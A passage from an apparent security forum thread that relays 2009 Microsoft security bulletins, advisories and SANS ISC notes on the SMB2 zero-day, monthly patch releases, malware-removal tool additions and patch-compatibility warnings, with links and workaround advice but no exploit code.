http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1926
MS09-049 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1132
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7099
Last Updated: 2009-09-08 19:14:07 UTC
___

MS Severity and Exploitability Index
- http://blogs.technet.com/photos/msrcteam/images/3279846/original.aspx

MS Deployment Prioritization Assessment
- http://blogs.technet.com/photos/msrcteam/images/3279847/original.aspx

.

FYI...

Vista/2008/Windows7 SMB2 BSOD 0-Day
- http://isc.sans.org/diary.html?storyid=7093
Last Updated: 2009-09-08 13:09:06 UTC - "... vulnerability affecting Microsoft SMB2* can be remotely crashed with proof-of-concept code that has been published yesterday and a Metasploit module is out. We have confirmed it affects Windows 7/Vista/Server 2008. The exploit needs no authentication, only file sharing enabled with one 1 packet to create a BSOD. We recommend filtering access to port TCP 445 with a firewall. Windows 2000/XP are NOT affected by this exploit..."
* http://en.wikipedia.org/wiki/Server_Message_Block#SMB2
___

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
September 08, 2009 - "Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs...
Workarounds...
• Disable SMB v2... modify the registry key...
• Block TCP ports 139 and 445 at the firewall..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103
Last revised: 09/09/2009

- http://www.symantec.com/connect/blogs/bsod-and-possibly-more
September 15, 2009

:fear:

FYI...

SMB2 remote exploit released
- http://isc.sans.org/diary.html?storyid=7141
Last Updated: 2009-09-16 21:15:36 UTC - "... 0-day vulnerability in SMB2 on Windows Vista and Server 2008 operating systems... Yesterday a well known security company added a module for their exploitation product. The module contains the remote exploit for this vulnerability – in other words, any user running this tool can get full access to affected machines. If the exploit is stable enough, it can _very easily_ be used in a worm, so it can potentially be devastating. So, if you are running a Windows Vista or Server 2008 machine (Windows 7 RTM is not affected, RC *is*), be sure you apply one of workarounds listed by Microsoft (they are not perfect, but they can help), available here*..."
* http://www.microsoft.com/technet/security/advisory/975497.mspx

- http://www.theregister.co.uk/2009/09/16/windows_vista_exploit_released/
16 September 2009

:fear::mad::fear:

FYI...

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
Updated: September 17, 2009 - "...Workarounds:
• Disable SMB v2... See Microsoft Knowledge Base Article 975497* to use the automated Microsoft Fix it solution to enable or disable this workaround...
* http://support.microsoft.com/kb/975497

• V1.1 (September 17, 2009): Clarified the FAQ, What is SMBv2? Added a link to Microsoft Knowledge Base Article 975497 to provide an automated Microsoft Fix it solution* for the workaround, Disable SMB v2...

- http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx
September 18, 2009

:fear:

FYI...

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
• V1.2 (September 23, 2009): Clarified the FAQ, What is Server Message Block Version 2 (SMBv2)? Also clarified the impact of the workaround, Disable SMB v2.
(See: "Workarounds... Impact of Workaround...")
"... Some of the applications or services that could be impacted are listed..."

:fear:

FYI...

Metasploit exploit module released
- http://www.symantec.com/security_response/threatconlearn.jsp
"... tracking a remotely exploitable vulnerability affecting the SMB kernel component ('srv2.sys'). Microsoft has reported that Windows Vista (SP1 and SP2) and Windows Server 2008 are affected. Reportedly, some beta builds of Windows 7 may also be affected.

On September 28, 2009, a remote code-execution exploit Metasploit module was released publicly. Attackers may be able to convert this module into other exploits and use it in the wild. We strongly advise users to block TCP port 445 immediately until patches are available. The researcher who discovered the flaw has stated that file sharing must be enabled for the issue to be exploit. Unless file sharing is explicitly required, users should disable it..."

:fear:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-oct.mspx
October 13, 2009 - "This bulletin summary lists security bulletins released for October 2009...
(Total of -13-)

Critical -8-

Microsoft Security Bulletin MS09-050
Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517)
- http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-051
Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682)
- http://www.microsoft.com/technet/security/bulletin/ms09-051.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-052
Vulnerability in Windows Media Player Could Allow Remote Code Execution (974112)
- http://www.microsoft.com/technet/security/bulletin/ms09-052.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-054
Cumulative Security Update for Internet Explorer (974455)
- http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-055
Cumulative Security Update of ActiveX Kill Bits (973525)
- http://www.microsoft.com/technet/security/bulletin/ms09-055.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-060
Vulnerabilities in Microsoft Active Template Library (ATL) ActiveX Controls for Microsoft Office Could Allow Remote Code Execution (973965)
- http://www.microsoft.com/technet/security/bulletin/ms09-060.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

Microsoft Security Bulletin MS09-061
Vulnerabilities in the Microsoft .NET Common Language Runtime Could Allow Remote Code Execution (974378)
- http://www.microsoft.com/technet/security/bulletin/ms09-061.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Microsoft .NET Framework, Microsoft Silverlight

Microsoft Security Bulletin MS09-062
Vulnerabilities in GDI+ Could Allow Remote Code Execution (957488)
- http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Internet Explorer, Microsoft .NET Framework, Microsoft Office, Microsoft SQL Server, Microsoft Developer Tools, Microsoft Forefront

Important -5-

Microsoft Security Bulletin MS09-053
Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)
- http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-056
Vulnerabilities in Windows CryptoAPI Could Allow Spoofing (974571)
- http://www.microsoft.com/technet/security/bulletin/ms09-056.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-057
Vulnerability in Indexing Service Could Allow Remote Code Execution (969059)
- http://www.microsoft.com/technet/security/bulletin/ms09-057.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-058
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (971486)
- http://www.microsoft.com/technet/security/bulletin/ms09-058.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-059
Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service (975467)
- http://www.microsoft.com/technet/security/bulletin/ms09-059.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7345
Last Updated: 2009-10-13 21:08:21 UTC
___

Severity summary and exploitability index
- http://blogs.technet.com/photos/msrcteam/images/3286577/original.aspx
October 13, 2009

Deployment priority
- http://blogs.technet.com/photos/msrcteam/images/3286578/original.aspx
October 13, 2009
___

MSRT
- http://support.microsoft.com/?kbid=890830
October 13, 2009 - Revision: 65.0
(Recent additions)
Win32/FakeRean August 2009 (V 2.13) Moderate
Win32/Bredolab September 2009 (V 2.14) Moderate
Win32/Daurso September 2009 (V 2.14) Moderate
Win32/FakeScanti October 2009 (V 3.0) Moderate
- http://www.microsoft.com/security/malwareremove/families.aspx

//

FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
• V4.0 (October 13, 2009): Advisory revised to add an entry in the Updates related to ATL section to communicate the release of Microsoft Security Bulletin MS09-060, "Vulnerabilities in Microsoft Active Template Library (ATL) ActiveX Controls for Microsoft Office Could Allow Remote Code Execution."
- http://www.microsoft.com/technet/security/bulletin/ms09-060.mspx

Microsoft Security Advisory (975191)
Vulnerabilities in the FTP Service in Internet Information Services
- http://www.microsoft.com/technet/security/advisory/975191.mspx
• V3.0 (October 13, 2009): Advisory updated to reflect publication of security bulletin (MS09-053).
- http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
• V2.0 (October 13, 2009): Advisory updated to reflect publication of security bulletin (MS09-050).
- http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx

:fear:

FYI...

Do NOT Apply MS09-056/KB974571 to LCS/OCS Servers
- http://blogs.technet.com/dodeitte/archive/2009/10/13/do-not-apply-kb974571-to-lcs-ocs-servers.aspx
October 13, 2009 11:04 PM - "Currently an issue is being observed after applying KB974571 (MS09-056: Vulnerabilities in CryptoAPI could allow spoofing) to LCS/OCS servers, that is causing them to believe that they are running an evaluation version of LCS/OCS and that it has expired..."
- http://support.microsoft.com/kb/974571/

:fear::fear:

FYI...

Microsoft Security Advisory (973811)
Extended Protection for Authentication
- http://www.microsoft.com/technet/security/advisory/973811.mspx
Updated: October 14, 2009 - "... Microsoft Security Bulletin MS09-054 contains a defense-in-depth, non-security update that enables WinINET to opt in to Extended Protection for Authentication.
• V1.1 (October 14, 2009): Updated the FAQ with information about a non-security update included in MS09-054* relating to WinINET.
* http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx

:spider:

FYI...

Update released for MS09-054
- http://blogs.technet.com/msrc/archive/2009/11/02/update-released-for-ms09-054.aspx
November 02, 2009 - "Today we released an update 976749 that addresses two issues with MS09-054 that a limited number customers reported to us through our Customer Service and Support (CSS) group. These two issues can affect the proper display of web pages. For additional details, please refer to Microsoft Knowledge Base article 976749*. Security update MS09-054 was released as part of the October Security Bulletin Release cycle and protects against the vulnerabilities outlined in the bulletin. Also, we’re not currently aware of any attempts to attack the vulnerabilities. While the number of customers affected by these two issues is limited, after working both with affected customers and our CSS group, we feel the best thing for all customers is to proactively provide this update as widely as possible to help prevent other customers from encountering the issues outlined in the KB. Because of this, we plan to release this update through the same broad release channels as the original security update, MS09-054. Customers will see 976749 offered by default through Windows Update, Microsoft Update, and Automatic Updates. Customers who have applied MS09-054 should go ahead and apply 976749. Customers who have not yet applied MS09-054 should apply -both- MS09-054 and 976749..."
* http://support.microsoft.com/kb/976749
November 3, 2009 - Revision: 5.0 - "...Important: Do not install this update if you have not installed security update 974455. If you install this update without first installing security update 974455, Internet Explorer may not work correctly. If this occurs, uninstall this update, install security update 974455, and then reinstall this update..."

- http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx
• V2.0 (November 2, 2009): Revised to announce the availability of a hotfix to address application compatibility issues. Customers who have already applied this update may install the hotfix from Microsoft Knowledge Base Article 976749. Also corrected the log file names, spuninst folder names, and registry key values for Microsoft Windows 2000.

- http://secunia.com/advisories/36979/2/
Critical: Highly critical
2009-11-03: Updated "Solution" section as Microsoft issues an update to address certain problems introduced by the original patches. Added link in "Original Advisory" section.

:fear:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-nov.mspx
November 10, 2009 - "This bulletin summary lists security bulletins released for November 2009..." (Total of -6-)

Critical -3-

Microsoft Security Bulletin MS09-063 - Critical
Vulnerability in Web Services on Devices API Could Allow Remote Code Execution (973565)
- http://www.microsoft.com/technet/security/bulletin/ms09-063.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-064 - Critical
Vulnerability in License Logging Server Could Allow Remote Code Execution (974783)
- http://www.microsoft.com/technet/security/bulletin/ms09-064.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-065 - Critical
Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)
- http://www.microsoft.com/technet/security/Bulletin/MS09-065.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Important -3-

Microsoft Security Bulletin MS09-066 - Important
Vulnerability in Active Directory Could Allow Denial of Service (973309)
- http://www.microsoft.com/technet/security/bulletin/ms09-066.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-067 - Important
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652)
- http://www.microsoft.com/technet/security/bulletin/MS09-067.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

Microsoft Security Bulletin MS09-068 - Important
Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (976307)
- http://www.microsoft.com/technet/security/bulletin/MS09-068.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7564
Last Updated: 2009-11-10 18:36:34 UTC
___

Severity summary and exploitability index
- http://blogs.technet.com/photos/msrcteam/images/3292868/original.aspx
November 10, 2009

Deployment priority
- http://blogs.technet.com/photos/msrcteam/images/3292871/original.aspx
November 10, 2009
___

MSRT
- http://support.microsoft.com/?kbid=890830
November 10, 2009 - Revision: 66.0
(Recent additions)
Win32/Bredolab - September 2009 (V 2.14) - Moderate
Win32/Daurso - September 2009 (V 2.14) - Moderate
Win32/FakeScanti - October 2009 (V 3.0) - Moderate
Win32/FakeVimes - November 2009 (V 3.1) - Moderate
Win32/PrivacyCenter - November 2009 (V 3.1) - Moderate

//

FYI...

Microsoft Security Advisory (977544)
Vulnerability in SMB Could Allow Denial of Service
- http://www.microsoft.com/technet/security/advisory/977544.mspx
November 13, 2009 - "Microsoft is investigating new public reports of a possible denial of service vulnerability in the Server Message Block (SMB) protocol. This vulnerability cannot be used to take control of or install malicious software on a user’s system. However, Microsoft is aware that detailed exploit code has been published for the vulnerability. Microsoft is not currently aware of active attacks that use this exploit code or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs. Microsoft is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk. We continue to encourage responsible disclosure of vulnerabilities..."

- http://isc.sans.org/diary.html?storyid=7597
Last Updated: 2009-11-14 02:36:34 UTC - "... Assuming that you block TCP ports 139 and 445 the only impact would be an internal attacker could disable affected systems until restarted. In the grand scheme of things this would not be a critical issue unless all of a sudden your servers had to be rebooted on a regular basis, in that case you may have bigger problems because the fox would already be in the henhouse. The list of affected systems is: Windows 7 for 32-bit Systems, Windows 7 for x64-based Systems, Windows Server 2008 R2 for x64-based Systems (includig Server Core), and Windows Server 2008 R2 for Itanium-based Systems..."

:clown: